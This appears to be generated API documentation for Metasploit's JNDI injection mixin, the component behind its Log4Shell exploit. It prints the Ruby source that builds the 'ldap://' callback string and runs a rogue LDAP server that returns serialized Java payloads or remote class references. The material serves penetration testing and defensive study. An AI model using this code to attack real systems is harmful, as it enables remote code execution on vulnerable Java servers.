Module: Msf::Exploit::Remote::JndiInjection

Includes:

Java, JavaDeserialization, LDAP::Server

Included in:

Log4Shell

Defined in:

lib/msf/core/exploit/remote/jndi_injection.rb

Instance Attribute Summary

Attributes included from LDAP::Server

#service

Attributes included from SocketServer

#service

Instance Method Summary

• #build_ldap_search_response(msg_id, base_dn) ⇒ Array

  Generate and serialize the payload as an LDAP search response.

• #build_ldap_search_response_payload ⇒ Array

  Build the LDAP response to the search request that contains the serialized payload.

• #build_ldap_search_response_payload_inline(gadget_chain) ⇒ Array

  Build the LDAP response to the search request that contains the serialized payload to be executed.

• #build_ldap_search_response_payload_remote(pay_url, pay_class = 'metasploit.PayloadFactory') ⇒ Array

  Build the LDAP response to the search request that contains a reference to an HTTP server from which a remote class will be loaded.

• #initialize(info = {}) ⇒ Object
• #jndi_string(resource = nil) ⇒ String

  Create the JNDI injection string that will trigger an LDAP connection back to Metasploit.

• #on_dispatch_request(client, data) ⇒ Object

  LDAP service callbacks.

• #validate_configuration! ⇒ Object

Methods included from LDAP::Server

#on_send_response, #read_ldif, #start_service

Methods included from SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string

Methods included from JavaDeserialization

gadget_chains, #generate_java_deserialization_for_command, #generate_java_deserialization_for_payload

Methods included from Powershell

#bypass_powershell_protections, #cmd_psh_payload, #compress_script, #decode_script, #decompress_script, #encode_script, #generate_psh_args, #generate_psh_command_line, #make_subs, #process_subs, #read_script, #run_hidden_psh

Methods included from Java

#build_jar, #compile, #init_jvm, #query_jvm, #save_to_file, #serialized_class_from_jar, #sign_jar

Instance Method Details

#build_ldap_search_response(msg_id, base_dn) ⇒ Array

Generate and serialize the payload as an LDAP search response

Parameters:

• msg_id (Integer) —

  LDAP message identifier

• base_dn (Sting) —

  LDAP distinguished name

Returns:

• (Array) —

  packed BER sequence

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 83

def build_ldap_search_response(msg_id, base_dn)
  attrs = build_ldap_search_response_payload
  appseq = [
    base_dn.to_ber,
    attrs.to_ber_sequence
  ].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
  [ msg_id.to_ber, appseq ].to_ber_sequence
end

#build_ldap_search_response_payload ⇒ Array

Build the LDAP response to the search request that contains the serialized payload.

Returns:

• (Array) —

  the array of attributes to add to the returned search data of the query response.

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 96

def build_ldap_search_response_payload
  # exploit authors should override this and either call the inline one with a gadget chain that is compatible with
  # the target or setup an HTTP server and call the remote one
  build_ldap_search_response_payload_inline('BeanFactory')
end

#build_ldap_search_response_payload_inline(gadget_chain) ⇒ Array

Build the LDAP response to the search request that contains the serialized payload to be executed.

Parameters:

• gadget_chain (String) —

  The gadget chain to use to execute the payload. This value must be compatible with the target application.

Returns:

• (Array) —

  the array of attributes to add to the returned search data of the query response.

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 108

def build_ldap_search_response_payload_inline(gadget_chain)
  java_payload = generate_java_deserialization_for_payload(gadget_chain, payload)
  [
    [ 'javaClassName'.to_ber, [ rand_text_alphanumeric(8..15).to_ber ].to_ber_set ].to_ber_sequence,
    [ 'javaSerializedData'.to_ber, [ java_payload.to_ber ].to_ber_set ].to_ber_sequence
  ]
end

#build_ldap_search_response_payload_remote(pay_url, pay_class = 'metasploit.PayloadFactory') ⇒ Array

Build the LDAP response to the search request that contains a reference to an HTTP server from which a remote class will be loaded. The target must have the trusted code base option enabled for this technique to work. The HTTP server from which the class is hosted is not managed by this method.

Parameters:

• pay_url (String) —

  The URL from which the class should be loaded.

• pay_class (String) (defaults to: 'metasploit.PayloadFactory') —

  The payload class name.

Returns:

• (Array) —

  the array of attributes to add to the returned search data of the query response.

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 124

def build_ldap_search_response_payload_remote(pay_url, pay_class = 'metasploit.PayloadFactory')
  [
    [ 'javaClassName'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,
    [ 'javaFactory'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,
    [ 'objectClass'.to_ber, [ 'javaNamingReference'.to_ber ].to_ber_set ].to_ber_sequence,
    [ 'javaCodebase'.to_ber, [ pay_url.to_ber ].to_ber_set ].to_ber_sequence,
  ]
end

#initialize(info = {}) ⇒ Object

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 18

def initialize(info = {})
  super(update_info(info,
    'Stance' => Msf::Exploit::Stance::Aggressive))

  register_advanced_options([
    OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true])
  ])
end

#jndi_string(resource = nil) ⇒ String

Create the JNDI injection string that will trigger an LDAP connection back to Metasploit.

Returns:

• (String) —

  the JNDI string

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 30

def jndi_string(resource = nil)
  resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
  "ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}"
end

#on_dispatch_request(client, data) ⇒ Object

LDAP service callbacks

Handle incoming requests via service mixin

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 39

def on_dispatch_request(client, data)
  return if data.strip.empty?

  data.extend(Net::BER::Extensions::String)
  begin
    pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
    vprint_status("LDAP request data remaining: #{data}") unless data.empty?
    resp = case pdu.app_tag
           when Net::LDAP::PDU::BindRequest # bind request
             client.authenticated = true
             service.encode_ldap_response(
               pdu.message_id,
               Net::LDAP::ResultCodeSuccess,
               '',
               '',
               Net::LDAP::PDU::BindResult
             )
           when Net::LDAP::PDU::SearchRequest # search request
             if client.authenticated || datastore['LDAP_AUTH_BYPASS']
               client.write(build_ldap_search_response(pdu.message_id, pdu.search_parameters[:base_object]))
               service.encode_ldap_response(pdu.message_id, Net::LDAP::ResultCodeSuccess, '', 'Search success', Net::LDAP::PDU::SearchResult)
             else
               service.encode_ldap_response(pdu.message_i, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)
             end
           else
             vprint_status("Client sent unexpected request #{pdu.app_tag}")
             client.close
           end
    resp.nil? ? client.close : on_send_response(client, resp)
  rescue StandardError => e
    print_error("Failed to handle LDAP request due to #{e}")
    client.close
  end

  resp
end

#validate_configuration! ⇒ Object

# File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 133

def validate_configuration!
  if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
    fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
  end
end